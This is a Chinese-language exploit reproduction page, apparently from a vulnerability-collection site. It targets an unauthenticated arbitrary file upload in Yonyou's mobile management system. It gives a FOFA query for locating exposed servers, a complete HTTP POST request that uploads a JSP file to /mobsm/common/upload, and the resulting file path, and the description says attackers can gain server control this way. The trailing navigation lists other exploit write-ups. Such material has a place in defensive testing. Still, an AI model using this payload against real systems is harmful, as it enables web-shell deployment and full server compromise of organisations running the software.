Y19-4用友-移动管理系统-文件上传

漏洞描述：

用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统 /mobsm/common/upload存在任意文件上传漏洞，未经授权攻击者通过漏洞上传任意文件，最终可以获取服务器权限。

网站图片:

网络测绘:

fofa语法：

●fofa：app=“用友-移动系统管理”

漏洞复现:

payload：

POST /mobsm/common/upload?category=/hotwebs/mobsm/uploadComponent HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 123
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="file"; filename="stc.jsp"

test
--00content0boundary00--

效果图:

上传文件位置

http://xx.xx.xx.xx/mobsm/uploadComponent/visitor/stc_20230819071510697.jsp

Menu

Share

Y19-4用友-移动管理系统-文件上传

Y19-4用友-移动管理系统-文件上传

漏洞描述：

网站图片:

网络测绘:

fofa语法：

漏洞复现:

Comment

Z22-1正方-移动信息服务管理系统-任意文件上传

Z20-1ZoneMinder--SQL

Z17-2紫光-电子档案管理系统-InformationLeakage

P5-2平升-电子水库监测管理平台-SQL

M3-2明源云-ERP系统接口管家-任意文件上传

用友U8Cloud-RepAddToTaskAction-SQL注入

蓝凌OAsysUiComponent未授权复制

Q14-1群杰-印章物联网管理平台-PermissionAC

Y4-21用友-NC-XXE

泛微ecology-v9-ModeDateService-SQL注入